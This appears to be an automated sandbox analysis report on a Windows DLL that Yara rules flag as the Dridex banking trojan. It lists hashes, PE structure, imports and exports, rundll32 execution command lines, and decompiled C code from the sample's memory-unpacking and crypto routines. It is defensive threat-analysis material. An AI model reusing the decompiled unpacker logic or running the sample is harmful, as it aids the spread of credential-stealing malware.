Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.9.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0CF.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4694
Entropy (8bit):	4.49012452156466
Encrypted:	false
SSDEEP:	48:cvIwSD8zsNJgtWI9wkckWSC8BY8fm8M4JCdsoFu+q8/JMd4SrSVd:uITfnyc9SNzJZZDWVd
MD5:	B3001A8D69959B513E4C32F8498E9A51
SHA1:	DE60C3446E86F7F99BF4F47F1CD3DE8B63B276E4
SHA-256:	8332ABDFE622AD0816941B5EB74996F7CF83F01E0DFE8B0D08BFA90021845277
SHA-512:	F3365D1CB94415F2EBED370243FE01E7D4059837476540FADBDB1DE4BD06B3A0977838DDE89D5F50CF2222245E6117F3D37CD468B0472AB936201E2E4C88D3FF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1229591" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.160195302212999
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll
File size:	1093632
MD5:	2228471d39760f9a389ac95f71b671a9
SHA1:	38b7d35e72c995ca526e293af9d448a7a8011df6
SHA256:	a9238550f705b9668a390a9e7b9e4dec6a88daec2c8acca19ffa10af328d594d
SHA512:	48d40173dfbc5dd798efbae2252b9599d2dd88b3a9b9535e4f7203de79bd272c24b5c914f5b809774d1b3b146b8fd3a12446bc4d5855959eca3229e0a97b7194
SSDEEP:	24576:tjsXggYiykQsMy2GSuCAaimSQws2yyq+YoWEUK6ES0wOyeSGwswWquEQq2GiMcis:m
File Content Preview:	MZ......................@........................................IZ..(4..(4..(4..z..&)4.....Z)4..Q...)4..u5..(4.....K(4..v6."(4.7....(4. ...,(4.....i(4.....Z(4..(5.f)4.Rich.(4.........................PE..L...&.ya...........!.... `...P.......K.......p.....

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10004b90
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61798526 [Wed Oct 27 16:58:14 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	ae858e1bcf44b240b65263bbd6945db2

Entrypoint Preview

Instruction
mov eax, dword ptr [10106128h]
call eax
mov edx, eax
ret
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push ebx
push edi
push esi
and esp, FFFFFFF8h
sub esp, 000000A8h
mov eax, dword ptr [ebp+08h]
mov dword ptr [esp+0000009Ch], 008A6C3Fh
mov byte ptr [esp+00000083h], 00000072h
mov dword ptr [esp+6Ch], 6C57D91Ch
mov dword ptr [esp+00000094h], 00000000h
mov dword ptr [esp+00000090h], 0093F6B2h
mov ecx, dword ptr [ebp+08h]
mov edx, esp
mov dword ptr [edx], ecx
mov dword ptr [esp+38h], eax
call 00007F4854B78312h
movzx ecx, word ptr [esp+000000A2h]
mov si, cx
mov word ptr [esp+000000A2h], B4E5h
mov byte ptr [esp+37h], al
mov dword ptr [esp+30h], ecx
mov word ptr [esp+2Eh], si
call 00007F4854B7868Bh
mov ecx, dword ptr [esp+0000008Ch]
mov edx, ecx
add edx, DE3924BAh
mov dword ptr [esp+0000008Ch], edx
mov dword ptr [esp+70h], eax
mov eax, dword ptr [esp+30h]
add eax, eax
mov si, ax
mov word ptr [esp+000000A2h], si
mov eax, dword ptr [esp+70h]
mov edx, dword ptr [esp+00000090h]
mov edi, dword ptr [esp+00000094h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xfad60	0x5f	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xfae3c	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x108000	0x3e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x109000	0x2a38	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x705c	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5dfe	0x6000	False	0.381795247396	data	4.41548626837	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0xf4032	0xf5000	False	0.135155253508	data	7.11998014415	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xfc000	0xbd1c	0xb000	False	0.234153053977	data	5.69509557044	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x108000	0x3e8	0x1000	False	0.119873046875	data	1.03136554304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x109000	0x2a38	0x3000	False	0.231608072917	data	5.67874721692	IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x108060	0x388	data

Imports

DLL	Import
SHELL32.dll	SHGetDesktopFolder
IPHLPAPI.DLL	GetIfTable
ADVAPI32.dll	RegOverridePredefKey
msvcrt.dll	memset
OLEAUT32.dll	VarR4FromI2
KERNEL32.dll	CreateFileW, GetModuleFileNameW
SETUPAPI.dll	SetupDiEnumDeviceInfo
USER32.dll	ShowOwnedPopups

Exports

Name	Ordinal	Address
FFRgpmdlwwWde	1	0x100fadb0

Version Infos

Description	Data
LegalCopyright	Copyright 2004
InternalName	ddlb
FileVersion	5.2.00.0
Full Version	5.2.0_00-b00
CompanyName	Sun Microsystems, Inc.
ProductName	Ddlb(EA) 2 Tsyfezyt Bidibhex Ernseqa 5.0 Urdate 6
ProductVersion	5.2.00.0
FileDescription	Java(TM) 2 Platform Standard Edition binary
OriginalFilename	ddlb.dll
Translation	0x0000 0x04b0

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5868 Parent PID: 3576

General

Start time:	04:57:19
Start date:	28/10/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll'
Imagebase:	0xae0000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 3248 Parent PID: 5868

General

Start time:	04:57:20
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6436 Parent PID: 5868

General

Start time:	04:57:20
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll,FFRgpmdlwwWde
Imagebase:	0x900000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.423290755.000000006E8B1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6404 Parent PID: 3248

General

Start time:	04:57:20
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',#1
Imagebase:	0x900000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6900 Parent PID: 5868

General

Start time:	04:58:44
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',CheckTrust
Imagebase:	0x900000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000009.00000002.780387984.000000006E8B1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7144 Parent PID: 5868

General

Start time:	04:58:45
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',DllCanUnloadNow
Imagebase:	0x900000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000B.00000002.753337263.000000006E8B1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000B.00000000.698176529.000000006E8B1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000B.00000000.676132737.000000006E8B1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6296 Parent PID: 5868

General

Start time:	04:58:46
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',DllGetClassObject
Imagebase:	0x900000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000C.00000000.680670011.000000006E8B1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000C.00000002.719392684.000000006E8B1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2944 Parent PID: 5868

General

Start time:	04:58:47
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',DownloadFile
Imagebase:	0x900000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000D.00000000.682183733.000000006E8B1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000D.00000002.749868846.000000006E8B1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3892 Parent PID: 5868

General

Start time:	04:58:49
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',GetICifFileFromFile
Imagebase:	0x900000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000E.00000000.701129229.000000006E8B1000.00000020.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: WerFault.exe PID: 4508 Parent PID: 7144

General

Start time:	05:00:10
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7144 -s 652
Imagebase:	0xd90000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 5404 Parent PID: 6296

General

Start time:	05:00:15
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6296 -s 652
Imagebase:	0xd90000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 5868 Parent PID: 3576 loaddll32.exeCOMMON

Executed Functions

Function 007B2062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E007B2062(long __ebx, void* __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				char* _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t139;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t180;
				intOrPtr _t223;
				void* _t230;
				intOrPtr _t233;
				void* _t240;
				intOrPtr _t244;
				intOrPtr _t255;
				intOrPtr _t266;
				DWORD* _t268;
				void* _t272;
				intOrPtr* _t275;
				intOrPtr* _t276;

				_t139 = _a4;
				_v20 = 0;
				_t240 =  *((intOrPtr*)(_t139 + 4));
				 *0x7b4418 = 1;
				asm("movaps xmm0, [0x7b3010]");
				asm("movups [0x7b4428], xmm0");
				_v48 = _t139;
				_v52 =  *((intOrPtr*)(_t139 + 0x58));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v184 = _t240;
				_v60 =  *((intOrPtr*)(_v48 + 0x2c));
				_v180 = _v56;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t139 + 0x50));
				_v68 = 4;
				_v72 = _t240;
				_v76 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t268); // executed
				_v80 = _t147;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x38));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E007B26BF();
				E007B23B9(_v72,  *((intOrPtr*)(_v48 + 0x30)), _v60);
				E007B26BF( *((intOrPtr*)(_v48 + 0x30)), 0, _v60);
				_t155 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t275 = _t272 - 0x88;
				_t230 = _v72;
				_t255 =  *((intOrPtr*)(_t230 + 0x3c));
				_v100 = _t155;
				_v104 = _v72 + 0x3c;
				_v108 = _t230;
				_v112 = _t255;
				if(_t255 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v152 = _v108;
				if(_v64 == 0) {
					L2:
					 *_t275 = _v72;
					_v116 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
					_t159 = DisableThreadLibraryCalls(??);
					_t276 = _t275 - 4;
					_t233 =  *_v104;
					_v120 = _t159;
					_v124 = _t233;
					_v128 = _v72;
					if(_t233 != 0) {
						_v128 = _v72 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
					}
					_t244 = _v48;
					_v44 =  *((intOrPtr*)(_t244 + 0x40));
					_v40 =  *((intOrPtr*)(_t244 + 0x54));
					_v36 =  *((intOrPtr*)(_t244 + 0x44));
					_v32 =  *((intOrPtr*)(_t244 + 0x18));
					_v28 =  *((intOrPtr*)(_t244 + 0x34));
					_v24 = _v116;
					 *_t276 = _t244;
					_v184 = 0;
					_v180 = 0x5c;
					_v156 =  &_v44;
					_v160 = 0;
					_v164 = 0x5c;
					_v168 =  *((intOrPtr*)(_v128 + 0x28));
					E007B26BF();
					if(_v168 != 0) {
						_t275 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
				} else {
					_v136 = 0;
					_v132 = _v152 + 0x18 + ( *(_v152 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_v140 = _t174;
						_t266 = _v140;
						_v184 = _v72 +  *((intOrPtr*)(_t266 + 0xc));
						_v180 =  *((intOrPtr*)(_t266 + 8));
						_v176 =  *((intOrPtr*)(0x7b4418 + (( *(_t174 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t174 + 0x24) >> 0x1f << 3) + (( *(_t174 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v144 = _v136;
						_t180 = VirtualProtect(??, ??, ??, ??); // executed
						_t275 = _t275 - 0x10;
						_t223 = _v144 + 1;
						_v148 = _t180;
						_v136 = _t223;
						_v132 = _v140 + 0x28;
						if(_t223 == _v64) {
							goto L2;
						}
					}
					goto L2;
				}
				return 1;
			}

0x007b206e
0x007b207c
0x007b2083
0x007b2086
0x007b2090
0x007b2097
0x007b20a1
0x007b20a7
0x007b20b0
0x007b20b9
0x007b20bc
0x007b20c2
0x007b20c6
0x007b20ce
0x007b20d5
0x007b20d8
0x007b20db
0x007b20de
0x007b20e1
0x007b20fb
0x007b2101
0x007b2104
0x007b210c
0x007b2110
0x007b2113
0x007b2116
0x007b2119
0x007b211c
0x007b2138
0x007b2155
0x007b217a
0x007b217c
0x007b2185
0x007b2188
0x007b2192
0x007b2195
0x007b2198
0x007b219b
0x007b219e
0x007b236f
0x007b236f
0x007b22ce
0x007b22d4
0x007b21a9
0x007b21b7
0x007b21bf
0x007b21c2
0x007b21c4
0x007b21ca
0x007b21d6
0x007b21d9
0x007b21dc
0x007b21df
0x007b23b1
0x007b23b1
0x007b22ef
0x007b22f5
0x007b22fb
0x007b2301
0x007b2307
0x007b230d
0x007b2313
0x007b2316
0x007b2319
0x007b2321
0x007b2329
0x007b232f
0x007b2335
0x007b233b
0x007b2341
0x007b234f
0x007b22bb
0x007b22c1
0x007b22c1
0x007b22da
0x007b238e
0x007b2394
0x007b21ea
0x007b21ea
0x007b2204
0x007b2229
0x007b2238
0x007b223b
0x007b223f
0x007b2243
0x007b224a
0x007b2250
0x007b2252
0x007b225b
0x007b226c
0x007b2272
0x007b2278
0x007b227b
0x00000000
0x00000000
0x007b2281
0x00000000
0x007b21ea
0x007b22aa

APIs

VirtualProtect.KERNELBASE ref: 007B20E1
VirtualProtect.KERNELBASE ref: 007B217A

Strings

\, xrefs: 007B2321

Memory Dump Source

Source File: 00000001.00000002.692510221.00000000007B0000.00000040.00000010.sdmp, Offset: 007B0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 92439cacc0e60437e0f79832b51a256e829b3f9b425d0df22ba456cb2955213e
Instruction ID: 9a57d0186dad52bfc2875430c7df3600ba3cc35764575f1d4a4e37e61a8ac864
Opcode Fuzzy Hash: 92439cacc0e60437e0f79832b51a256e829b3f9b425d0df22ba456cb2955213e
Instruction Fuzzy Hash: 5191ACB4E052188FDB04DFA9C580A9DFBF1FF48314F25856AE958AB352D334A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 007B21EA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 007B2250

Strings

\, xrefs: 007B2321

Memory Dump Source

Source File: 00000001.00000002.692510221.00000000007B0000.00000040.00000010.sdmp, Offset: 007B0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 04eae270011076262ae99a61ca778e292a87af6b9a87d8e1f1bcb6a3f62d580e
Instruction ID: 50c67f1141a657e48123532d3850b90e277400c58b8d580efe53e31682c85de5
Opcode Fuzzy Hash: 04eae270011076262ae99a61ca778e292a87af6b9a87d8e1f1bcb6a3f62d580e
Instruction Fuzzy Hash: 7451CFB5E012298FCB14CF59C980A9DFBF1BF88310F2681A9D958A7312D734AD91CF90

Uniqueness

Uniqueness Score: -1.00%

Function 007B1E9D, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 007B1F29

Memory Dump Source

Source File: 00000001.00000002.692510221.00000000007B0000.00000040.00000010.sdmp, Offset: 007B0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction ID: 739d5f2c615d2a7ad52048ebf0954717ccc39283a7a3ab974eef10cc6e3680fe
Opcode Fuzzy Hash: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction Fuzzy Hash: 9541D2B1E052198FDB04DFA8C4946AEBBF1FF48310F58856AE848AB341D379A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E8B1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 27%

			E6E8B1494(intOrPtr __ecx, void* __edx) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				void* _v72;
				char _v76;
				void* _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				void* _v212;
				void* _v216;
				void* _v220;
				void* _v224;
				void* _v228;
				void* _v232;
				void* _v236;
				void* _v240;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				void* _v256;
				void* _v260;
				void* _v264;
				void* _v268;
				void* _v272;
				void* _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				void* _v340;
				void* _v344;
				void* _v348;
				void* _v352;
				void* _v356;
				intOrPtr _t196;
				void* _t197;
				void* _t198;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				void* _t203;
				intOrPtr* _t205;
				intOrPtr* _t206;
				intOrPtr* _t322;
				intOrPtr* _t368;

				_t368 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				_push(0);
				L6E8BF5A8();
				_v60 = 0x790529cb;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0xdee5e4fb;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xeabbe5b1;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				asm("pxor xmm0, xmm0");
